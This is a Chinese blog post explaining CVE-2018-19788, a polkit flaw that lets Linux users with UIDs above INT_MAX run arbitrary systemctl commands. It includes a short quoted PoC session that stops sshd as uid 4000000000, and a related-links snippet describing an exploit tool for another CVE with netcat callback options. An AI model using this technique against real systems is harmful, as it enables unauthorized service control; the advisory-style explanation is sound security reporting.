linux源码漏洞,CVE-2018-19788:UID 大于 INT_MAX 的 Linux 用户任意代码执行漏洞

最新推荐文章于 2023-01-10 21:45:12 发布
最新推荐文章于 2023-01-10 21:45:12 发布
阅读量375 收藏
点赞数
文章标签: linux源码漏洞

Linux 操作系统中 UID 值大于 2147483647 的低权限账户可以未授权执行任意 systemctl 命令。该漏洞存在于 PolicyKit(polkit)中,PolicyKit 是类 Unix 操作系统中定义策略、处理系统范围内权限和提供给非特权进程与特权进程通信方式的应用级工具集,比如 sudo。

该漏洞 CVE 编号为CVE-2018-19788,影响 PolicyKit v0.115 版本,这是大多数主流 Linux 发行版中预装的版本,其中包括Red Hat, Debian, Ubuntu和 CentOS。

漏洞是因为 PolicyKit 没有 UID 大于 INT_MAX 的低权限用户的权限请求进行适当的验证。INT_MAX 是计算机程序中用于定义整数变量可以保存的最大值的常量,等于 2147483647,十六进制表示为 0x7FFFFFFF。

也就是说,如果用户在受影响的 Linux 操作系统中创建了 UID 大于 INT_MAX 值的用户账户,攻击者就可以利用 PolicyKit 组件来执行任意的 systemctl 命令。

$ systemctl --version systemd 239 +PAM +AUDIT -SELINUX +IMA +APPARMOR +SMACK -SYSVINIT +UTMP -LIBCRYPTSETUP +GCRYPT -GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID -ELFUTILS +KMOD +IDN2 -IDN +PCRE2 default-hierarchy=hybrid

$ id uid=4000000000 ( someuser ) gid=100 ( users ) groups=100 ( users ) $ systemctl stop sshd.service ( pkttyagent:3342 ) : GLib-GObject-WARNING **: 13:28:53.802: value "-294967296" of type 'gint' is invalid or out of range for property 'uid' of type 'gint' ** ERROR:pkttyagent.c:156:main: assertion failed: ( polkit_unix_process_get_uid ( POLKIT_UNIX_PROCESS ( subject ) ) >= 0 ) $ systemctl is-active sshd.service inactive

安全研究人员 Rich Mirch(Twitter @0xm1rch)发布了该漏洞的 PoC,用 UID 4000000000 证明了该漏洞。

在补丁发布之前,Red Hat 建议系统管理员不要设置负值 UID 或大于 2147483646 的 UID,以缓解该漏洞可能带来的威胁。

kylin小鸡内裤
关注
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
Linux宏之INT_MAXINT_MIN等等
WW141109的博客
03-15 988
  为了移植性能的考虑,为了同一份代码在不同平台不同CPU下都能正确获得对应平台的各种数据大小范围,Linux下使用的宏是这样的: 1 #define INT_MAX ((int)(~0U>>1)) 2 #define INT_MIN (-INT_MAX - 1) 3 #define UINT_MAX (~0U) 4 #define LONG_MAX...
Linux的资源和限制
weixin_42581560的博客
11-13 482
Linux系统的资源描述
INT_MAX INT_MIN及其运算
最新发布
xiaomu_Y的博客
01-10 1847
上溢是2147483647很容易理解,2147483647=2^31-1 (因为要有一个符号位,所以把第一位作为符号位,0为正,1为负),但为什么下溢的时候分明是31位来表示的数会出现2147483648呢
linux maxint32,C++中INT_MAX / INT_MIN
weixin_34213766的博客
05-14 2335
参考链接 https://www.cnblogs.com/yangxin6017/p/9500867.htmlINT_MAX = 2^31 - 1 =2147483647,INT_MIN= - 2^31 = -2147483648INT_MIN需定义成 -INT_MAX - 1, 因为-2147483648无法表示, 无法对2147483648取反INT_MAX + 1 = INT_MININT_...
C++的 INT_MAXINT_MIN
m0_51913750的博客
12-18 6183
C++ 的 INT_MAXINT_MIN
CVE-2018-8120-exp.zip_C++_CVE-2018-8120_cve_漏洞利用
09-23
**CVE-2018-8120详解:Windows LSA权限提升漏洞** CVE-2018-8120是一个针对Windows操作系统的安全漏洞,它属于本地权限提升(Local Security Authority Subsystem Service, LSA)漏洞类型。这个漏洞主要影响Windows...
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT输出利用rtf -i IP,--ip IP表示netcat -p PORT ,--port netcat的PORT端口 例如: ...
oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip
01-19
CVE-2012-1675是一个特定的漏洞,它可能允许未经身份验证的远程攻击者执行代码或获取敏感信息,对系统的安全性构成威胁。 补丁“p12880299”是Oracle官方发布的一个修复程序,旨在修补CVE-2012-1675漏洞。补丁编号...
Linux int 最大为多大
weixin_30724853的博客
02-15 422
可以查看 /usr/include/limits.h 文件 里面定义好了各种类型的最大最小值 ... /* Minimum and maximum values a `signed int' can hold. */# define INT_MIN (-INT_MAX - 1)...
/usr/include/linux/netfilter.h: 错误:‘in’的类型不完全,netfilter_ipv4.h:53: ‘INT_MIN’‘INT_MAX’未声明解决方法
layrong的专栏
08-08 3500
/usr/include/linux/netfilter.h:64: 错误:字段‘in’的类型不完全 /usr/include/linux/netfilter.h:65: 错误:字段‘in6’的类型不完全 In file included from testhook_2.c:13: /usr/includenux/netfilter_ipv4.h:53: 错误:‘INT_MIN’未声明(不在
【C/C++】整型上下限INT_MAX INT_MIN及其运算
小橙的IT求学之路
01-19 503
C中常量INT_MAXINT_MIN分别表示最大、最小整数,定义在头文件limits.h中。1. INT_MAX,INT_MIN数值大小因为int占4字节32位,根据二进制编码的规则,INT_MAX = 2^31-1,INT_MIN= -2^31.C/C++中,所有超过该限值的数,都会出现溢出,出现warn...
【ACM】INT_MAXINT_MIN注意事项
热门推荐
小小小草儿的博客哟
11-04 2万+
INT_MIN在标准头文件limits.h中定义。#define INT_MAX 2147483647 #define INT_MIN (-INT_MAX - 1)在C/C++语言中,不能够直接使用-2147483648来代替最小负数,因为这不是一个数字,而是一个表达式。表达式的意思是对整数21473648取负,但是2147483648已经溢出了int的上限,所以定义为(-INT_MAX -1)。C
INT_MAX
bxw1992的博客
08-11 2055
#define INT_MAX  (((unsigned int)(-1))>>1)
cjson 整型数最大值不能超过INT_MAX
is_old_zhao的博客
03-30 1813
cJSON_Number 表示一个数字值。该值存储为double in valuedouble和in valueint。若是数字超出整数范围,INT_MAXINT_MIN用于valueint cjson.c: static char print_number(cJSON item,printbuffer p) { char str=0; double d=item->valuedouble; if (d==0) { if § str=ensure(p,2); else str=(char)c
linux系统polkit无法启动
qq_38402294的博客
11-17 2万+
polkitlinux系统中的一个身份认证管理工具 (Authorization Manager ),在启动一些服务时,有可能会遇到polkit不能正常启动运行的情况,会报出以下错误: 查看polkit的运行状态发现是failed: 此时发现polkit并没有处于正常的激活状态,由此可能会导致其他一些服务也不能正常启动。 首先可以尝试使用以下命令重装polkit再启动: yum reinstall polkit systemctl start polkit.service 运气好的话.
assertion failed怎么解决_嵌入式Linux论坛问题精选以及解决方法
weixin_39951018的博客
11-10 3431
天韦东山老师花了半天时间在交流社区答疑,这不小编马上送来热腾腾的9个问题以及解决方法,答案全部出自韦老师一人之手,全是精华。可能只有区区20字,但里面包含了珍贵的经验和情怀。对了,之前发的问题对你有启发吗,或者正好解决了你问题?麻烦给我们反馈一下,还有,只有论坛版主以上级别才能更改问题状态,我们回答问题,问你是否解决,等回复,假设解决了,我们更改问题状态,这样一来一去,沟通成本太大,希望你的问题被...
【转】关于int范围中负数最小值的绝对值比整数最大值大初学C,问题源自:为什么C中的int类型(16位)的下溢下限为-32768而上溢上限却是32767。 首先说吧,32767很容易理解,32767=
Fighting..
06-25 4175
初学C,问题源自:为什么C中的int类型(16位)的下溢下限为-32768而上溢上限却是32767。 首先说吧,32767很容易理解,32767=2^15-1 (因为要有一个符号位),但为什么下溢的时候分明是15位来表示的数会出现32768呢??   首先从原码讲起,原码即为计算机中对数值的二进制表示,如 5用二进制表示为0000 0101 ;   其次就是反码,反码
修复OpenSSH J PAKE漏洞CVE-2010-4478:Linux OpenSSH重装指南
"解决OpenSSH J-PAKE授权问题漏洞CVE-2010-4478的Linux上OpenSSH重装方法" OpenSSH是一款广泛使用的开源安全协议,用于在Linux和Unix系统之间提供加密的网络服务,如远程登录、文件传输等。然而,它也可能会存在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值